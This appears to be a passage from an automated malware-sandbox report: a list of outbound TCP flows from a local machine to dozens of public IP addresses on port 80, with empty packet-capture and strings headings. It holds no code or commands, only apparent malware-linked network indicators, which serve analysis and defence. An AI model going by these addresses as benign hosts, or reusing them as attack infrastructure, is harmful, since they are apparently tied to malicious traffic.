Flows TCP192.168.1.1:1063 ➝ 107.180.26.90:80
Flows TCP192.168.1.1:1064 ➝ 50.62.245.1:80
Flows TCP192.168.1.1:1065 ➝ 107.180.4.133:80
Flows TCP192.168.1.1:1066 ➝ 178.255.42.139:80
Flows TCP192.168.1.1:1067 ➝ 62.149.226.198:80
Flows TCP192.168.1.1:1068 ➝ 50.62.69.1:80
Flows TCP192.168.1.1:1069 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1070 ➝ 50.62.104.1:80
Flows TCP192.168.1.1:1071 ➝ 50.63.42.1:80
Flows TCP192.168.1.1:1072 ➝ 192.185.48.135:80
Flows TCP192.168.1.1:1073 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1074 ➝ 69.197.163.146:80
Flows TCP192.168.1.1:1075 ➝ 184.168.221.44:80
Flows TCP192.168.1.1:1076 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1077 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1078 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1079 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1080 ➝ 192.186.235.6:80
Flows TCP192.168.1.1:1081 ➝ 173.234.209.98:80
Flows TCP192.168.1.1:1082 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1083 ➝ 216.38.129.210:80
Flows TCP192.168.1.1:1084 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1085 ➝ 62.182.61.62:80
Flows TCP192.168.1.1:1086 ➝ 128.140.220.8:80
Flows TCP192.168.1.1:1087 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1088 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1089 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1090 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1091 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1092 ➝ 107.180.4.26:80
Flows TCP192.168.1.1:1093 ➝ 185.14.56.94:80
Flows TCP192.168.1.1:1094 ➝ 184.168.26.1:80
Flows TCP192.168.1.1:1095 ➝ 192.232.219.235:80
Flows TCP192.168.1.1:1096 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1097 ➝ 192.186.222.229:80
Flows TCP192.168.1.1:1098 ➝ 69.163.208.246:80
Flows TCP192.168.1.1:1099 ➝ 107.180.44.135:80
Flows TCP192.168.1.1:1100 ➝ 87.106.167.110:80
Flows TCP192.168.1.1:1101 ➝ 192.254.233.175:80
Flows TCP192.168.1.1:1102 ➝ 107.180.44.125:80
Flows TCP192.168.1.1:1103 ➝ 50.63.95.1:80
Flows TCP192.168.1.1:1104 ➝ 106.187.103.246:80
Flows TCP192.168.1.1:1105 ➝ 173.234.209.98:80
Flows TCP192.168.1.1:1106 ➝ 192.254.186.154:80
Flows TCP192.168.1.1:1107 ➝ 72.167.131.9:80
Flows TCP192.168.1.1:1108 ➝ 80.88.88.152:80
Flows TCP192.168.1.1:1109 ➝ 107.180.26.90:80
Flows TCP192.168.1.1:1110 ➝ 50.62.245.1:80
Flows TCP192.168.1.1:1111 ➝ 107.180.4.133:80
Flows TCP192.168.1.1:1112 ➝ 178.255.42.139:80
Flows TCP192.168.1.1:1113 ➝ 62.149.226.198:80
Flows TCP192.168.1.1:1114 ➝ 50.62.69.1:80
Flows TCP192.168.1.1:1115 ➝ 184.168.19.1:80
Flows TCP192.168.1.1:1116 ➝ 50.62.104.1:80
Flows TCP192.168.1.1:1117 ➝ 50.63.42.1:80
Flows TCP192.168.1.1:1118 ➝ 192.185.48.135:80
Flows TCP192.168.1.1:1119 ➝ 188.121.47.1:80
Flows TCP192.168.1.1:1120 ➝ 69.197.163.146:80
Flows TCP192.168.1.1:1121 ➝ 184.168.221.44:80
Flows TCP192.168.1.1:1122 ➝ 192.254.233.175:80

Raw Pcap

Strings